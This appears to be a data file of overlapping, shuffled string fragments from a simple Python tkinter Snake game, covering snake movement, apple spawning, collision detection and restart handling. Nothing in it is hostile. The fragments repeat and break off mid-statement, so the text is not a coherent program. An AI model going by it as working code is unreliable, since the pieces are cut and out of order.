"bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial",
"s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): #",
"* random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def",
"fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME: s.move()",
"Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True",
"for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main)",
"Setting up window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT,",
"y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def",
"(0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial",
"\"\"\" Single snake segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y,",
"apple to be eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE)",
"WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True #",
"Moves the snake with the specified vector\"\"\" for index in range(len(self.segments)-1): segment =",
"possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1),",
"posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1,",
"self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class",
"c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global",
"fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\",",
"= SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE)",
"Not IN_GAME -> stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal')",
"class \"\"\" def __init__(self, segments): self.segments = segments # possible moves self.mapping =",
"text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white',",
"movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the",
"x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2",
"snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3]",
"\"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in",
"state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text,",
"range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME",
"IN_GAME = False root.after(100, main) # Not IN_GAME -> stop game and print",
"== c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1): if",
"y1 < 0 or y2 > HEIGHT: IN_GAME = False # Eating apples",
"BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE *",
"= create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating",
"y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance)",
"y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self,",
"vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 =",
"= head_coords # Check for collision with gamefield edges if x2 > WIDTH",
"-1), \"Left\": (-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"] def move(self):",
"# Check for collision with gamefield edges if x2 > WIDTH or x1",
"= self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item,",
"HEIGHT: IN_GAME = False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK)",
"SEG_SIZE)] return Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay Snake\") c",
"y)) def change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if event.keysym in",
"tkinter import Tk, Canvas import random # Globals WIDTH = 800 HEIGHT =",
"for collision with gamefield edges if x2 > WIDTH or x1 < 0",
"c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE,",
"= False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() #",
"to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y",
"state='hidden') start_game() def start_game(): global s create_block() s = create_snake() # Reaction on",
"= last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction",
"s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check for",
"event): \"\"\" Changes direction of snake \"\"\" if event.keysym in self.mapping: self.vector =",
"font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text, \"<Button-1>\", clicked) start_game() root.mainloop()",
"print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment",
"True # Helper functions def create_block(): \"\"\" Creates an apple to be eaten",
"\"Left\": (-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\"",
"x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple",
"set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self,",
"start_game() def start_game(): global s create_block() s = create_snake() # Reaction on keypress",
"Self-eating else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False",
"moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\":",
"Handles game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1,",
"(0, -1), \"Left\": (-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"] def",
"\"\"\" Moves the snake with the specified vector\"\"\" for index in range(len(self.segments)-1): segment",
"game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1,",
"IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords",
"= SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE,",
"def __init__(self, segments): self.segments = segments # possible moves self.mapping = {\"Down\": (0,",
"Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments = segments #",
"IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s",
"x1 < 0 or y1 < 0 or y2 > HEIGHT: IN_GAME =",
"class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments = segments",
"\"\"\" def __init__(self, segments): self.segments = segments # possible moves self.mapping = {\"Down\":",
"\"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"]",
"- SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event):",
"# catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red',",
"index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment,",
"x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self):",
"snake with the specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1,",
"root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() #",
"with the specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1,",
"def create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE),",
"posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global IN_GAME if",
"y1, x2, y2 = head_coords # Check for collision with gamefield edges if",
"SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) /",
"def main(): \"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords",
"or y1 < 0 or y2 > HEIGHT: IN_GAME = False # Eating",
"state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden')",
"BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process",
"self.segments = segments # possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1,",
"# Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME =",
"HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True # Helper functions def",
"x1, y1, x2, y2 = head_coords # Check for collision with gamefield edges",
"= 600 SEG_SIZE = 20 IN_GAME = True # Helper functions def create_block():",
"or y2 > HEIGHT: IN_GAME = False # Eating apples elif head_coords ==",
"set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x, y):",
"game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2,",
"\"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2",
"to be eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) /",
"< 0 or y1 < 0 or y2 > HEIGHT: IN_GAME = False",
"class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x, y): self.instance =",
"Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root = Tk()",
"SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy,",
"0 or y2 > HEIGHT: IN_GAME = False # Eating apples elif head_coords",
"self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if",
"self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1,",
"y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments",
"= 20 IN_GAME = True # Helper functions def create_block(): \"\"\" Creates an",
"an apple to be eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1,",
"IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game():",
"change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if event.keysym in self.mapping: self.vector",
"game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single",
"segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments)",
"def add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x",
"x = last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y))",
"s create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def",
"HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30',",
"SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay",
"up window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\")",
"SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root =",
"def start_game(): global s create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\",",
"SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game",
"# Helper functions def create_block(): \"\"\" Creates an apple to be eaten \"\"\"",
"segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME",
"the specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2,",
"direction of snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self):",
"/ SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx,",
"y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes",
"index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) #",
"'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x, y): self.instance",
"height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\",",
"- SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of snake",
"-> stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object):",
"800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True # Helper functions",
"Tk, Canvas import random # Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE",
"<reponame>MadJedi/pythonsnakegame<gh_stars>0 from tkinter import Tk, Canvas import random # Globals WIDTH = 800",
"\"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments = segments # possible",
"20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to",
"= [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window",
"main(): \"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords =",
"OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click",
"root.after(100, main) # Not IN_GAME -> stop game and print message else: set_state(restart_text,",
"catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden')",
"IN_GAME = True # Helper functions def create_block(): \"\"\" Creates an apple to",
"c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE,",
"c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME -> stop game and",
"WIDTH or x1 < 0 or y1 < 0 or y2 > HEIGHT:",
"segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2,",
"Simple Snake class \"\"\" def __init__(self, segments): self.segments = segments # possible moves",
"initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with",
"\"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance)",
"creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return",
"y2 = head_coords # Check for collision with gamefield edges if x2 >",
"width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME",
"functions def create_block(): \"\"\" Creates an apple to be eaten \"\"\" global BLOCK",
"s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global",
"move(self): \"\"\" Moves the snake with the specified vector\"\"\" for index in range(len(self.segments)-1):",
"else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100,",
"< 0 or y2 > HEIGHT: IN_GAME = False # Eating apples elif",
"c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check for collision with gamefield",
"head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME -> stop",
"global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 =",
"eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy",
"= c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check for collision with",
"20 IN_GAME = True # Helper functions def create_block(): \"\"\" Creates an apple",
"def change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if event.keysym in self.mapping:",
"self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state)",
"y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment",
"1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement",
"600 SEG_SIZE = 20 IN_GAME = True # Helper functions def create_block(): \"\"\"",
"for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global",
"0)} # initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the",
"of snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for",
"x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake \"\"\"",
"keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and snake segments =",
"range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1,",
"the snake with the specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance",
"global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def",
"snake segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE,",
"posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global IN_GAME",
"def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def",
"\"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy =",
"c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def",
"(HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\"",
"Check for collision with gamefield edges if x2 > WIDTH or x1 <",
"IN_GAME = False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block()",
"Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] -",
"Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x,",
"the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y =",
"segments # possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\":",
"def move(self): \"\"\" Moves the snake with the specified vector\"\"\" for index in",
"in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def",
"= 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True # Helper",
"# creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)]",
"Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if event.keysym",
"def create_block(): \"\"\" Creates an apple to be eaten \"\"\" global BLOCK posx",
"x1, y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE,",
"SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of snake \"\"\"",
"self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the specified vector\"\"\"",
"with gamefield edges if x2 > WIDTH or x1 < 0 or y1",
"c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text, \"<Button-1>\", clicked)",
"= c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance)",
"y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg",
"= {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)}",
"Changes direction of snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def",
"y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake",
"main) # Not IN_GAME -> stop game and print message else: set_state(restart_text, 'normal')",
"or x1 < 0 or y1 < 0 or y2 > HEIGHT: IN_GAME",
"font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here",
"self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item,",
"Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and snake",
"= self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the specified vector\"\"\" for",
"Single snake segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE,",
"c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial",
"restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text,",
"\"\"\" Changes direction of snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym]",
"(WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK =",
"if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments:",
"return Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay Snake\") c =",
"IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check",
"0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement direction self.vector =",
"main() def create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2,",
"s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1): if head_coords ==",
"# Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else:",
"True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s",
"specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2",
"SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\")",
"head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check for collision",
"random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main():",
"Creates an apple to be eaten \"\"\" global BLOCK posx = SEG_SIZE *",
"(1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement direction self.vector",
"Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing",
"x2, y2 = head_coords # Check for collision with gamefield edges if x2",
"posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME:",
"last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self,",
"= last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def",
"posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE,",
"= c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text, \"<Button-1>\",",
"in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1,",
"__init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\"",
"Helper functions def create_block(): \"\"\" Creates an apple to be eaten \"\"\" global",
"def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object):",
"segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE",
"__init__(self, segments): self.segments = segments # possible moves self.mapping = {\"Down\": (0, 1),",
"\"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3] -",
"keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text",
"# initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake",
"reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event):",
"set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK)",
"# possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0,",
"clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game()",
"self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1,",
"self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state):",
"state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text,",
"def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True",
"and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake",
"else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def",
